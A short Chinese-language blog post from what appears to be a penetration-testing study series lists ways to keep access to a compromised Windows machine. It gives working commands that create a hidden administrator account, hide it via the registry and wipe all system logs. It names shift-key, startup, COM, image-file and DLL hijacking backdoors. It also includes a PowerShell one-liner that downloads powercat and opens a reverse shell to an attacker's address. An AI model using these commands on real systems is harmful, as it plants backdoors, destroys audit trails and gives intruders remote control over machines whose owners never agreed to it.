權限維持的方法
基本上現在常見的方法有以下幾種:
1、隱藏、克隆賬戶
windows 隱藏賬戶
net localgroup “Domain Admin” test$ /add
net user test$ test /add
net localgroup Administrators test$ /add
net localgroup "Remote Desktop Users" test$ /add
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v test$ /T REG_DWORD /D 0
net user test$ /del
del %WINDIR%\*.log /a/s/q/f 洗掉所有日志檔案
2、shift后門
3、啟動項、計劃任務
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup
4、劫持技術
com劫持
映像劫持 : 改注冊表,debugger
dll劫持,clr
5、Powershell后門
powershell IEX (New-Object
System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip地址 -p 埠 -e cmd
詳細步驟鏈接:https://www.cnblogs.com/xiaozi/p/7613288.html
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/57061.html
標籤:其他
上一篇:滲透測驗學習 二十九、kali安裝,資訊搜集,服務器掃描
下一篇:XSS劫持cookie登錄